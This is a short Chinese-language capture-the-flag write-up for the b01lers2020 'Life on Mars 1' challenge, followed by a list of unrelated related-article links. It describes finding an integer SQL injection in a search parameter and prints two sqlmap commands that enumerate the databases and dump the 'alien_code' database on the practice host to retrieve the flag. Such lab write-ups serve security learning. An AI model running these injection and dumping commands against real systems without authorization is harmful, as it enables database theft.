[b01lers2020]Life on Mars 1

ZG206發表於2024-07-15

sql注入，資訊蒐集

開啟之後大腦一片空白，不知道入手點在哪，資訊什麼都查不到，最後抓包抓到了東西

發現抓包的時候出現了兩個引數，直接在網頁上訪問一下

發現爆裝備了，在這裡我卡了挺久的，最後是看其他師傅的wp發現這裡是sql注入，就是一個最基礎的整形注入，

確定了之後我們直接上sqlmap

python sqlmap.py -u http://02cf228b-5b04-4c11-8620-7c88de0db19e.node5.buuoj.cn:81/query?search=amazonis_planitia --dbs
爆出庫名

python sqlmap.py -u http://02cf228b-5b04-4c11-8620-7c88de0db19e.node5.buuoj.cn:81/query?search=amazonis_planitia -D alien_code --all
爆出資料

得到flag

What time is it on Mars?
2017-02-12
today, is it worth 1/30,000 of your life?
2024-06-29
MaxCompute Mars開發指南
2019-04-18
Jetpack架構元件學習(1)——LifeCycle的使用
2021-11-19
Jetpack架構元件
what is life?
2024-03-10
Life on the Farm
2024-04-01
Mars如何分散式地執行
2019-01-08
分散式
Eclipse Mars 如何安裝svn
2016-08-22
Eclipse
微信Mars——xlog使用全解析
2016-12-30
HDU 4059 The Boss on Mars ( 容斥原理)
2014-12-19
努比亞紅魔Mars電競手機評測紅魔Mars手機怎麼樣？
2018-12-14
Activitylifecyclecallbacks使用
2016-12-20
It's my life
2010-04-01
It s my life
2007-01-27
Two extremes in life
2007-10-12
REM
7.life
2024-03-30
Mars Chen影片XML程式碼實現
2021-09-09
XML
紅魔Mars電競手機怎麼樣？紅魔Mars手機的優缺點評測分析
2018-11-30
題解：CF1599F Mars
2024-06-27
Lifecycle 流程分析
2018-12-26
Management of Materials With Shelf Life
2007-09-06
1月9日雲棲精選夜讀|Mars演算法實踐——人臉識別
2019-01-09
演算法
在swift中接入微信開源庫Mars
2019-03-04
Swift
Mars演算法實踐——人臉識別
2019-01-08
演算法
Eclipse mars右鍵New選單項的…
2017-03-21
Eclipse
Eclipse4.5 mars 配置Velocity外掛
2015-07-28
Eclipse
Page Lifecycle API 教程
2018-11-05
API
RxLifecycle詳細解析
2018-07-08
targetFilterLifecycle的作用
2016-07-08
Filter
電影《It's a wonderful life》
2006-01-15
LeetCode:Game of Life
2016-01-14
LeetCodeGAM
my academic life
2024-03-17
人生房間Life Room
2024-03-23
OOM
[PAT]1027. Colors in Mars (20)@Java實現
2017-10-26
Java
Mars老師的Android學習基本路線
2012-03-17
Android
Net6 DI原始碼分析Part1 ServiceCollection、ServiceDescriptor、ServiceLifetime、IServiceProvider
2022-02-10
原始碼IDE
Scanlife：2012年Q1二維碼掃描資料
2012-06-04
Lifecycle原始碼淺析
2019-05-06
原始碼

[b01lers2020]Life on Mars 1

sql注入，資訊蒐集

相關文章